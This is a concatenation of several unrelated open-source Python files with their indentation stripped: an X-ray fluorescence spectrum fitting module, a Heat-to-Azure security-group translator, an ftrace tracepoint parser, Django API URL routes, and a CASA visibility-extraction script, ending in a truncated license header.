# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
__author__ = 'Li Li'
import numpy as np
import six
import json
from collections import OrderedDict
import copy
import os
from atom.api import (Atom, Str, observe, Typed,
Int, Dict, List, Float, Enum, Bool)
from skxray.fitting.background import snip_method
from skxray.constants.api import XrfElement as Element
from skxray.fitting.xrf_model import (ModelSpectrum, ParamController,
trim, construct_linear_model, linear_spectrum_fitting)
#from pyxrf.model.fit_spectrum import fit_strategy_list
import logging
logger = logging.getLogger(__name__)
bound_options = ['none', 'lohi', 'fixed', 'lo', 'hi']
fit_strategy_list = ['fit_with_tail', 'free_more',
'e_calibration', 'linear',
'adjust_element1', 'adjust_element2', 'adjust_element3']
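# Each strategy name above also becomes a per-parameter key (mirroring the
# parameter's 'bound_type') once create_full_dict() below has run, so the
# GUI can edit bound settings per fitting strategy.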
class Parameter(Atom):
# todo make sure that these are the only valid bound types
bound_type = Enum(*bound_options)
min = Float(-np.inf)
max = Float(np.inf)
value = Float()
default_value = Float()
fit_with_tail = Enum(*bound_options)
free_more = Enum(*bound_options)
adjust_element1 = Enum(*bound_options)
adjust_element2 = Enum(*bound_options)
adjust_element3 = Enum(*bound_options)
e_calibration = Enum(*bound_options)
linear = Enum(*bound_options)
name = Str()
description = Str()
tool_tip = Str()
@observe('name', 'bound_type', 'min', 'max', 'value', 'default_value')
def update_displayed_name(self, changed):
pass
# print(changed)
def __repr__(self):
return ("Parameter(bound_type={}, min={}, max={}, value={}, "
"default={}, free_more={}, adjust_element1={}, "
"adjust_element2={}, adjust_element3={}, "
"e_calibration={}, linear={}, description={}, "
"toop_tip={}".format(
self.bound_type, self.min, self.max, self.value, self.default_value,
self.free_more, self.adjust_element1, self.adjust_element2,
self.adjust_element3, self.e_calibration,
self.linear, self.description, self.tool_tip))
def to_dict(self):
return {
'bound_type': self.bound_type,
'min': self.min,
'max': self.max,
'value': self.value,
'default_value': self.default_value,
'fit_with_tail': self.fit_with_tail,
'free_more': self.free_more,
'adjust_element1': self.adjust_element1,
'adjust_element2': self.adjust_element2,
'adjust_element3': self.adjust_element3,
'e_calibration': self.e_calibration,
'linear': self.linear,
'name': self.name,
'description': self.description,
'tool_tip': self.tool_tip,
}
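# Minimal usage sketch for Parameter (the keyword values below are
# illustrative only, not taken from a real parameter file):
#
#     p = Parameter(bound_type='lohi', min=0.0, max=10.0,
#                   value=1.0, default_value=1.0, name='e_offset')
#     p.to_dict()   # -> plain dict, suitable for json.dump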
def format_dict(parameter_object_dict, element_list):
"""
Format the dictionary that scikit-xray expects.
Parameters
----------
parameter_object_dict : dict
    element_list : list
        List of element lines; joined into a comma-separated string
        before being stored under 'non_fitting_values'.
"""
param_dict = {key: value.to_dict() for key, value
in six.iteritems(parameter_object_dict)}
elo = param_dict.pop('energy_bound_low')['value']
ehi = param_dict.pop('energy_bound_high')['value']
non_fitting_values = {'non_fitting_values': {
'energy_bound_low': elo,
'energy_bound_high': ehi,
'element_list': ', '.join(element_list)
}}
param_dict.update(non_fitting_values)
return param_dict
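# Sketch of the structure format_dict() returns (keys and values shown are
# illustrative; each per-parameter entry is Parameter.to_dict()):
#
#     {'e_offset': {'bound_type': ..., 'min': ..., 'max': ..., ...},
#      ...,
#      'non_fitting_values': {'energy_bound_low': 2.5,
#                             'energy_bound_high': 12.0,
#                             'element_list': 'Fe_K, Cu_K'}}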
def dict_to_param(param_dict):
"""
    Convert a parameter dict into Parameter objects.

    Parameters
    ----------
    param_dict : dict
        fitting parameters
"""
temp_parameters = copy.deepcopy(param_dict)
non_fitting_values = temp_parameters.pop('non_fitting_values')
element_list = non_fitting_values.pop('element_list')
if not isinstance(element_list, list):
element_list = [e.strip(' ') for e in element_list.split(',')]
#self.element_list = element_list
elo = non_fitting_values.pop('energy_bound_low')
ehi = non_fitting_values.pop('energy_bound_high')
param = {
'energy_bound_low': Parameter(value=elo,
default_value=elo,
description='E low limit [keV]'),
'energy_bound_high': Parameter(value=ehi,
default_value=ehi,
description='E high limit [keV]')
}
for param_name, param_dict in six.iteritems(temp_parameters):
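        # Older parameter files may not carry 'default_value'; fall back
        # to the stored 'value' so loading such files does not fail.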
if 'default_value' in param_dict:
param.update({param_name: Parameter(**param_dict)})
else:
param.update({
param_name: Parameter(default_value=param_dict['value'],
**param_dict)
})
return element_list, param
class PreFitStatus(Atom):
"""
Data structure for pre fit analysis.
Attributes
----------
z : str
z number of element
spectrum : array
spectrum of given element
    status : bool
        True if the plot is visible
    stat_copy : bool
        copy of status
    maxv : float
        max value of the spectrum
    norm : float
        normalized value with respect to the strongest peak
    lbd_stat : bool
        whether the normalized value exceeds the display threshold
"""
z = Str()
energy = Str()
spectrum = Typed(np.ndarray)
status = Bool(False)
stat_copy = Bool(False)
maxv = Float()
norm = Float()
lbd_stat = Bool(False)
class ElementController(object):
"""
    This class provides basic operations to rank elements, toggle their
    visibility, and calculate normalized intensities.
"""
def __init__(self):
self.element_dict = OrderedDict()
def delete_item(self, k):
try:
del self.element_dict[k]
self.update_norm()
logger.info('Item {} is deleted.'.format(k))
        except KeyError as e:
logger.info(e)
def order(self, option='z'):
"""
Order dict in different ways.
"""
if option == 'z':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].z))
elif option == 'energy':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].energy))
elif option == 'name':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[0]))
elif option == 'maxv':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].maxv, reverse=True))
def add_to_dict(self, dictv):
self.element_dict.update(dictv)
self.update_norm()
def update_norm(self, threshv=0.1):
"""
Calculate the norm intensity for each element peak.
Parameters
----------
threshv : float
            Peaks whose normalized value is below this threshold are not shown.
"""
#max_dict = reduce(max, map(np.max, six.itervalues(self.element_dict)))
max_dict = np.max(np.array([v.maxv for v in six.itervalues(self.element_dict)]))
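        # Express each peak height as a percentage of the strongest peak;
        # lbd_stat then records whether it clears the display threshold.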
for v in six.itervalues(self.element_dict):
v.norm = v.maxv/max_dict*100
v.lbd_stat = bool(v.norm > threshv)
def delete_all(self):
self.element_dict.clear()
def get_element_list(self):
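        # Element-line keys like 'Fe_K' contain upper-case letters, while
        # non-element keys ('compton', 'elastic', 'background') are all
        # lower-case; use that distinction to filter.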
current_elements = [v for v in six.iterkeys(self.element_dict) if v.lower() != v]
logger.info('Current Elements for fitting are {}'.format(current_elements))
return current_elements
def update_peak_ratio(self):
"""
        Rescale each element's spectrum when users change its max value.
"""
for v in six.itervalues(self.element_dict):
v.maxv = np.around(v.maxv, 1)
v.spectrum = v.spectrum*v.maxv/np.max(v.spectrum)
self.update_norm()
def turn_on_all(self, option=True):
"""
Set plotting status on for all lines.
"""
        _plot = bool(option)
for v in six.itervalues(self.element_dict):
v.status = _plot
class GuessParamModel(Atom):
"""
    Auto-fit model used to guess the initial fitting parameters.
Attributes
----------
parameters : `atom.Dict`
A list of `Parameter` objects, subclassed from the `Atom` base class.
These `Parameter` objects hold all relevant xrf information.
data : array
1D array of spectrum
prefit_x : array
        X axis with range defined by low and high limits.
result_dict : dict
Save all the auto fitting results for each element.
It is a dictionary of object PreFitStatus.
param_d : dict
Parameters can be transferred into this dictionary.
param_new : dict
More information are saved, such as element position and width.
    total_y : dict
        Results from K lines
    total_y_l : dict
        Results from L lines
    total_y_m : dict
        Results from M lines
e_list : str
All elements used for fitting.
file_path : str
The path where file is saved.
element_list : list
"""
default_parameters = Dict()
#parameters = Dict() #Typed(OrderedDict) #OrderedDict()
data = Typed(object)
prefit_x = Typed(object)
result_dict = Typed(object) #Typed(OrderedDict)
result_dict_names = List()
#param_d = Dict()
param_new = Dict()
total_y = Dict()
total_y_l = Dict()
total_y_m = Dict()
e_name = Str()
add_element_intensity = Float()
#save_file = Str()
result_folder = Str()
#file_path = Str()
element_list = List()
data_sets = Typed(OrderedDict)
file_opt = Int()
data_all = Typed(np.ndarray)
EC = Typed(object)
def __init__(self, *args, **kwargs):
try:
self.default_parameters = kwargs['default_parameters']
#self.element_list, self.parameters = dict_to_param(self.default_parameters)
self.param_new = copy.deepcopy(self.default_parameters)
self.element_list = get_element(self.param_new)
#self.get_param(default_parameters)
except ValueError:
logger.info('No default parameter files are chosen.')
self.result_folder = kwargs['working_directory']
self.EC = ElementController()
def get_new_param(self, param_path):
"""
Update parameters if new param_path is given.
Parameters
----------
param_path : str
            path to the parameter file to load
"""
with open(param_path, 'r') as json_data:
self.param_new = json.load(json_data)
#self.element_list, self.parameters = dict_to_param(self.param_new)
self.element_list = get_element(self.param_new)
self.EC.delete_all()
self.create_spectrum_from_file(self.param_new, self.element_list)
logger.info('Elements read from file are: {}'.format(self.element_list))
#self.element_list, self.parameters = self.get_param(new_param)
def create_spectrum_from_file(self, param_dict, elemental_lines):
"""
Create spectrum profile with given param dict from file.
Parameters
----------
param_dict : dict
dict obtained from file
elemental_lines : list
            e.g., ['Na_K', 'Mg_K', 'Pt_M'] refers to the
K lines of Sodium, the K lines of Magnesium, and the M
lines of Platinum
"""
self.prefit_x, pre_dict = calculate_profile(self.data,
param_dict, elemental_lines)
#factor_to_area = factor_height2area()
temp_dict = OrderedDict()
for e in six.iterkeys(pre_dict):
ename = e.split('_')[0]
for k, v in six.iteritems(param_dict):
if ename in k and 'area' in k:
energy = float(get_energy(e))
factor_to_area = factor_height2area(energy, self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'compton' and k == 'compton_amplitude':
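                    # Compton-shifted line energy:
                    #     E' = E0 / (1 + (E0 / m_e c^2) * (1 - cos(theta)))
                    # with E0 the coherent scatter energy and theta the
                    # Compton angle from the parameter dict.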
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'elastic' and k == 'coherent_sct_amplitude':
factor_to_area = factor_height2area(self.param_new['coherent_sct_energy']['value'],
self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'background':
spectrum = pre_dict[e]
else:
continue
ps = PreFitStatus(z=get_Z(ename), energy=get_energy(e), spectrum=spectrum,
maxv=np.around(np.max(spectrum), 1),
norm=-1, lbd_stat=False)
temp_dict.update({e: ps})
self.EC.add_to_dict(temp_dict)
@observe('file_opt')
def choose_file(self, change):
if self.file_opt == 0:
return
        names = list(self.data_sets.keys())
self.data = self.data_sets[names[self.file_opt-1]].get_sum()
self.data_all = self.data_sets[names[self.file_opt-1]].raw_data
def manual_input(self):
default_area = 1e5
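        # Build a template profile with a nominal area, then rescale its
        # peak height below to the user-supplied intensity.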
logger.info('Element {} is added'.format(self.e_name))
#param_dict = format_dict(self.parameters, self.element_list)
x, data_out = calculate_profile(self.data, self.param_new,
elemental_lines=[self.e_name], default_area=default_area)
ps = PreFitStatus(z=get_Z(self.e_name), energy=get_energy(self.e_name),
spectrum=data_out[self.e_name]/np.max(data_out[self.e_name])*self.add_element_intensity,
maxv=self.add_element_intensity, norm=-1,
lbd_stat=False)
self.EC.add_to_dict({self.e_name: ps})
def update_name_list(self):
"""
When result_dict_names change, the looper in enaml will update.
"""
# need to clean list first, in order to refresh the list in GUI
self.result_dict_names = []
        self.result_dict_names = list(self.EC.element_dict.keys())
logger.info('Current element names are {}'.format(self.result_dict_names))
def find_peak(self, threshv=0.1):
"""
Run automatic peak finding, and save results as dict of object.
"""
#param_dict = format_dict(self.parameters, self.element_list)
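        # Decompose the summed spectrum into per-line components with a
        # linear model (element profiles plus scattering and background)
        # to obtain initial guesses for each element.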
self.prefit_x, out_dict = linear_spectrum_fitting(self.data,
self.param_new)
logger.info('Energy range: {}, {}'.format(self.param_new['non_fitting_values']['energy_bound_low']['value'],
self.param_new['non_fitting_values']['energy_bound_high']['value']))
#max_dict = reduce(max, map(np.max, six.itervalues(out_dict)))
prefit_dict = OrderedDict()
for k, v in six.iteritems(out_dict):
ps = PreFitStatus(z=get_Z(k), energy=get_energy(k), spectrum=v,
maxv=np.around(np.max(v), 1), norm=-1,
lbd_stat=False)
prefit_dict.update({k: ps})
logger.info('The elements from parameter guess: {}'.format(
            list(prefit_dict.keys())))
self.EC.add_to_dict(prefit_dict)
def create_full_param(self, peak_std=0.07):
"""
        Extend the param dict to a full one with detailed element
        information, and assign initial values from the pre-fit.
Parameters
----------
peak_std : float
            approximate standard deviation of an element peak.
"""
self.element_list = self.EC.get_element_list()
self.param_new['non_fitting_values']['element_list'] = ', '.join(self.element_list)
#param_d = format_dict(self.parameters, self.element_list)
self.param_new = param_dict_cleaner(self.param_new, self.element_list)
        logger.info('element list before register: {}'.format(self.element_list))
# create full parameter list including elements
PC = ParamController(self.param_new, self.element_list)
#PC.create_full_param()
self.param_new = PC.params
# to create full param dict, for GUI only
create_full_dict(self.param_new, fit_strategy_list)
logger.info('full dict: {}'.format(self.param_new.keys()))
logger.info('incident energy: {}'.format(self.param_new['coherent_sct_energy']['value']))
# update according to pre fit results
if len(self.EC.element_dict):
for e in self.element_list:
zname = e.split('_')[0]
for k, v in six.iteritems(self.param_new):
if zname in k and 'area' in k:
factor_to_area = factor_height2area(float(self.EC.element_dict[e].energy),
self.param_new)
v['value'] = self.EC.element_dict[e].maxv * factor_to_area
if 'compton' in self.EC.element_dict:
gauss_factor = 1/(1 + self.param_new['compton_f_step']['value']
+ self.param_new['compton_f_tail']['value']
+ self.param_new['compton_hi_f_tail']['value'])
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
self.param_new['compton_amplitude']['value'] = \
self.EC.element_dict['compton'].maxv * factor_to_area
if 'coherent_sct_amplitude' in self.EC.element_dict:
self.param_new['coherent_sct_amplitude']['value'] = np.sum(
self.EC.element_dict['elastic'].spectrum)
def data_for_plot(self):
"""
Save data in terms of K, L, M lines for plot.
"""
self.total_y = {}
self.total_y_l = {}
self.total_y_m = {}
new_dict = {k: v for (k, v) in six.iteritems(self.EC.element_dict) if v.status}
for k, v in six.iteritems(new_dict):
if 'K' in k:
self.total_y[k] = self.EC.element_dict[k].spectrum
elif 'L' in k:
self.total_y_l[k] = self.EC.element_dict[k].spectrum
elif 'M' in k:
self.total_y_m[k] = self.EC.element_dict[k].spectrum
else:
self.total_y[k] = self.EC.element_dict[k].spectrum
def save(self, fname='param_default1.json'):
"""
Save full param dict into a file at result directory.
The name of the file is predefined.
Parameters
----------
fname : str, optional
file name to save updated parameters
"""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'w') as outfile:
json.dump(self.param_new, outfile,
sort_keys=True, indent=4)
    def read_pre_saved(self, fname='param_default1.json'):
        """Read previously saved fitting parameters from the result directory."""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'r') as infile:
data = json.load(infile)
return data
def save_as(file_path, data):
"""
Save full param dict into a file.
"""
with open(file_path, 'w') as outfile:
json.dump(data, outfile,
sort_keys=True, indent=4)
def calculate_profile(y0, param,
elemental_lines, default_area=1e5):
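    """
    Build the spectrum of each requested elemental line plus scattering
    components and a snip background over the selected energy range, and
    return the calibrated energy axis together with a dict of components.
    """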
# Need to use deepcopy here to avoid unexpected change on parameter dict
fitting_parameters = copy.deepcopy(param)
x0 = np.arange(len(y0))
# ratio to transfer energy value back to channel value
approx_ratio = 100
lowv = fitting_parameters['non_fitting_values']['energy_bound_low']['value'] * approx_ratio
highv = fitting_parameters['non_fitting_values']['energy_bound_high']['value'] * approx_ratio
x, y = trim(x0, y0, lowv, highv)
e_select, matv = construct_linear_model(x, fitting_parameters,
elemental_lines,
default_area=default_area)
non_element = ['compton', 'elastic']
total_list = e_select + non_element
total_list = [str(v) for v in total_list]
temp_d = {k: v for (k, v) in zip(total_list, matv.transpose())}
# get background
bg = snip_method(y, fitting_parameters['e_offset']['value'],
fitting_parameters['e_linear']['value'],
fitting_parameters['e_quadratic']['value'])
temp_d.update(background=bg)
#for i in len(total_list):
# temp_d[total_list[i]] = matv[:, i]
x = (fitting_parameters['e_offset']['value']
+ fitting_parameters['e_linear']['value'] * x
+ fitting_parameters['e_quadratic']['value'] * x**2)
return x, temp_d
def create_full_dict(param, name_list):
"""
Create full param dict so each item has same nested dict.
This is for GUI purpose only.
.. warning :: This function mutates the input values.
    Parameters
----------
param : dict
all parameters including element
name_list : list
strategy names
"""
for n in name_list:
for k, v in six.iteritems(param):
if k == 'non_fitting_values':
continue
if n not in v:
v.update({n: v['bound_type']})
def get_Z(ename):
"""
Return element's Z number.
Parameters
----------
ename : str
element name
Returns
-------
    str
        element Z number, or '-' for non-element lines
"""
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
return str(e.Z)
def get_energy(ename):
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
        if '_K' in ename:
            energy = e.emission_line['ka1']
        elif '_L' in ename:
            energy = e.emission_line['la1']
        elif '_M' in ename:
            energy = e.emission_line['ma1']
        else:
            # fall back to the K alpha line so a bare element name does
            # not leave `energy` undefined
            energy = e.emission_line['ka1']
        return str(np.around(energy, 4))
def get_element(param):
element_list = param['non_fitting_values']['element_list']
return [e.strip(' ') for e in element_list.split(',')]
def factor_height2area(energy, param, std_correction=1):
"""
Factor to transfer peak height to area.
"""
temp_val = 2 * np.sqrt(2 * np.log(2))
epsilon = param['non_fitting_values']['electron_hole_energy']
sigma = np.sqrt((param['fwhm_offset']['value'] / temp_val)**2
+ energy * epsilon * param['fwhm_fanoprime']['value'])
return sigma*std_correction
def param_dict_cleaner(param, element_list):
"""
Make sure param only contains element from element_list.
Parameters
----------
param : dict
fitting parameters
element_list : list
list of elemental lines
Returns
-------
dict :
new param dict containing given elements
"""
param_new = {}
for k, v in six.iteritems(param):
if k == 'non_fitting_values' or k == k.lower():
param_new.update({k: v})
else:
if k[:2] in element_list:
param_new.update({k: v})
return param_new | bsd-3-clause | -2,165,580,146,740,394,200 | 36.340541 | 118 | 0.551446 | false |
aznashwan/heat2arm | heat2arm/translators/networking/secgroups/ec2_secgroup.py | 1 | 3254 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the definition for the EC2 security group translator.
"""
from heat2arm.translators.networking.secgroups.base_secgroup import (
BaseSecurityGroupARMTranslator
)
class EC2SecurityGroupARMTranslator(BaseSecurityGroupARMTranslator):
""" EC2SecurityGroupARMTranslator is the translator
for EC2 security groups.
"""
heat_resource_type = "AWS::EC2::SecurityGroup"
def _get_rules(self):
""" _get_rules is a helper method which returns a list of all
the resulting ARM security group rules to be created.
"""
i = 0
rules = []
# traverse all ingress rules; if any:
if "SecurityGroupIngress" in self._heat_resource.properties.data:
for in_rule in self._heat_resource.properties.data[
"SecurityGroupIngress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": in_rule["IpProtocol"],
"sourcePortRange": in_rule["FromPort"],
"destinationPortRange": in_rule["ToPort"],
"sourceAddressPrefix": in_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Inbound",
"access": "Allow",
                        # NOTE: priority is not user-configurable; rules
                        # are numbered sequentially starting at 100.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
# traverse all egress rules; if any:
if "SecurityGroupEgress" in self._heat_resource.properties.data:
for out_rule in self._heat_resource.properties.data[
"SecurityGroupEgress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": out_rule["IpProtocol"],
"sourcePortRange": out_rule["FromPort"],
"destinationPortRange": out_rule["ToPort"],
"sourceAddressPrefix": out_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Outbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
return rules
| apache-2.0 | -445,866,815,154,035,600 | 37.738095 | 78 | 0.527966 | false |
corakwue/ftrace | ftrace/parsers/sched_load_avg_cpu.py | 1 | 2005 | #!/usr/bin/python
# Copyright 2015 Huawei Devices USA Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors:
# Chuk Orakwue <[email protected]>
import re
from ftrace.common import ParserError
from .register import register_parser
try:
from ftrace.third_party.cnamedtuple import namedtuple
except ImportError:
from collections import namedtuple
TRACEPOINT = 'sched_load_avg_cpu'
__all__ = [TRACEPOINT]
SchedLoadAvgCpuBase = namedtuple(TRACEPOINT,
[
        'cpu',
'load_avg',
'util_avg'
]
)
class SchedLoadAvgCpu(SchedLoadAvgCpuBase):
__slots__ = ()
def __new__(cls, cpu, load_avg, util_avg):
cpu = int(cpu)
load_avg = int(load_avg)
util_avg = int(util_avg)
return super(cls, SchedLoadAvgCpu).__new__(
cls,
cpu=cpu,
load_avg=load_avg,
util_avg=util_avg,
)
sched_load_avg_cpu_pattern = re.compile(
r"""
cpu=(?P<cpu>\d+)\s+
load_avg=(?P<load_avg>\d+)\s+
util_avg=(?P<util_avg>\d+)
""",
re.X|re.M
)
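# Example payload matched by the pattern above (values are illustrative):
#   "cpu=2 load_avg=512 util_avg=448"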
@register_parser
def sched_load_avg_cpu(payload):
"""Parser for `sched_load_avg_cpu` tracepoint"""
try:
match = re.match(sched_load_avg_cpu_pattern, payload)
if match:
match_group_dict = match.groupdict()
return SchedLoadAvgCpu(**match_group_dict)
except Exception, e:
raise ParserError(e.message)
| apache-2.0 | 1,968,760,944,318,342,700 | 26.094595 | 74 | 0.632918 | false |
grepme/cmput410-project | api/urls.py | 1 | 1779 | from django.conf.urls import patterns, include, url
guid_regex = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
sha1_regex = "[a-zA-Z0-9]+"
id_regex = "(({guid})|({sha1}))".format(guid=guid_regex,sha1=sha1_regex)
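# An id is accepted either as a canonical GUID or as a plain SHA-1 style
# hex string.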
urlpatterns = patterns('api.views',
# get posts by a specific author that the current authenticated user
# can view
# author/id1/posts
# /api/author/ef3e0e05-c5f8-11e4-a972-b8f6b116b2b7/posts/
(r'^author/(?:(?P<author_id>{})/?)?posts/?(?:/(?P<page>\d*)/?)?$'.format(id_regex), 'get_posts'),
# Get a specific post or all public posts
(r'^posts/?(?:(?P<post_id>{}))?/?$'.format(id_regex), 'get_post'),
#See if a author_id is a friend with author_2_id
(r'^friends/(?P<author_id>{0})/(?P<author_2_id>{0})/?$'.format(id_regex), 'is_friend'),
    # POST a list of authors; returns those from the list who are friends
(r'^friends/(?P<author_id>{})/?$'.format(id_regex), 'get_friends'),
# GET authors on our server
(r'^author$', 'get_authors'),
# GET author on our server
(r'^author/(?P<profile_id>{})/?$'.format(id_regex), 'get_author'),
# Make a friend request with another user
(r'^friendrequest$', 'friend_request'),
# Follow a specific user
(r'^follow$', 'follow_user'),
# search for a user
#(r'search/(?P<name>([a-zA-Z0-9 -._~:?#%]+))/?$', 'search_users'),
)
| apache-2.0 | -7,852,624,737,404,225,000 | 44.615385 | 121 | 0.45756 | false |
jspilker/visilens | examples/Ex1_get_data_continuum.py | 1 | 4773 | """
Example 1, to be run within CASA. This script serves as a guideline
for how to get data out of a CASA ms and into a format which
visilens can use. We really don't need all that much information,
so we keep only the columns we need.
To keep the number of visibilities low, we first average the data
a bit. In this particular case, the on-source integration times were
only ~60s, so we won't average in time. We will average down each of
the four ALMA basebands (spectral windows), since this is continuum
data and the fractional bandwidth from the lowest to highest observed
frequency is small. We'll also average the two orthogonal polarizations,
since the source is unpolarized. Last, for fitting, we need an
accurate estimate of the uncertainty on each visibility. The *relative*
uncertainties in the data are okay, but they're not on any absolute scale,
so we need to calculate what the re-scaling factor should be. To do this,
we take the difference between successive visibilities on each baseline
(these are strong sources, so unfortunately we can't just use the rms)
and re-scale the noise to match. In principle CASA's statwt also does
this, but I found that it sometimes gave bizarre results (some baselines
weighted 100x more than others for no obvious reason, etc.). If you
have better luck with it, feel free to use that instead!
"""
import numpy as np
import os
c = 299792458.0 # in m/s
# Path to the calibrated ms file, and the source name we want.
inms = 'Compact_0202_to_0418.cal.ms'
field = 'SPT0202-61'
spw = '0,1,2,3'
# First we split out just the source we want from our ms file.
outms = field+'_'+inms[:3].lower()+'.ms'
os.system('rm -rf '+outms)
split(inms,outms,field=field,spw=spw,width=128,datacolumn='corrected',
keepflags=False)
# Now we'll get the visibility columns we need, before manipulating them.
# data_desc_id is a proxy for the spw number.
ms.open(outms,nomodify=True)
visdata = ms.getdata(['uvw','antenna1','antenna2','data','sigma','data_desc_id'])
visdata['data'] = np.squeeze(visdata['data']) # ditch unnecessary extra dimension
ms.close()
# Get the frequencies associated with each spw, because uvw coordinates are in m
tb.open(outms+'/SPECTRAL_WINDOW')
freqs = np.squeeze(tb.getcol('CHAN_FREQ')) # center freq of each spw
tb.close()
# Get the primary beam size from the antenna diameter. Assumes homogeneous array,
# sorry CARMA users.
tb.open(outms+'/ANTENNA')
diam = np.squeeze(tb.getcol('DISH_DIAMETER'))[0]
PBfwhm = 1.2*(c/np.mean(freqs))/diam * (3600*180/np.pi) # in arcsec
tb.close()
# Data and sigma have both polarizations; average them
visdata['data'] = np.average(visdata['data'],weights=(visdata['sigma']**-2.),axis=0)
visdata['sigma']= np.sum((visdata['sigma']**-2.),axis=0)**-0.5
# Convert uvw coords from m to lambda
for ispw in range(len(spw.split(','))):
visdata['uvw'][:,visdata['data_desc_id']==ispw] *= freqs[ispw]/c
# Calculate the noise re-scaling, by differencing consecutive visibilities on the
# same baseline. Have to do an ugly double-loop here; would work better if we knew
# in advance how the data were ordered (eg time-sorted). We assume that we can
# re-scale the noise using the mean of the re-scalings from each baseline.
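# For Gaussian noise the difference of two independent visibilities has a
# standard deviation of sqrt(2)*sigma_true, so each baseline's factor below
# is std(diffs) / (sqrt(2) * mean(sigma_nominal)); multiplying 'sigma' by
# the mean factor puts the uncertainties on an absolute scale.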
facs = []
for ant1 in np.unique(visdata['antenna1']):
for ant2 in np.unique(visdata['antenna2']):
if ant1 < ant2:
thisbase = (visdata['antenna1']==ant1) & (visdata['antenna2']==ant2)
reals = visdata['data'].real[thisbase]
imags = visdata['data'].imag[thisbase]
sigs = visdata['sigma'][thisbase]
diffrs = reals - np.roll(reals,-1); diffis = imags - np.roll(imags,-1)
std = np.mean([diffrs.std(),diffis.std()])
facs.append(std/sigs.mean()/np.sqrt(2))
facs = np.asarray(facs); visdata['sigma'] *= facs.mean()
print outms, '| mean rescaling factor: ',facs.mean(), '| rms/beam (mJy): ',1000*((visdata['sigma']**-2).sum())**-0.5
# If we ever want to mess with the data after re-scaling the weights, we have to
# write them back to the ms file. But, CASA doesn't like that we've averaged
# the polarizations together, so we have to keep them separate for this purpose.
ms.open(outms,nomodify=False)
replace = ms.getdata(['sigma','weight'])
replace['sigma'] *= facs.mean()
replace['weight'] = replace['sigma']**-2.
ms.putdata(replace)
ms.close()
# Create one single array of all this data, then save everything.
allarr = np.vstack((visdata['uvw'][0,:],visdata['uvw'][1,:],visdata['data'].real,
visdata['data'].imag,visdata['sigma'],visdata['antenna1'],visdata['antenna2']))
outfname = field+'_'+inms[:3].lower()+'.bin'
with open(outfname, 'wb') as f:
allarr.tofile(f)
f.write(PBfwhm)
| mit | 5,476,157,098,352,860,000 | 44.457143 | 116 | 0.699979 | false |
bbondy/brianbondy.gae | libs/sx/pisa3/pisa_tables.py | 1 | 13877 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
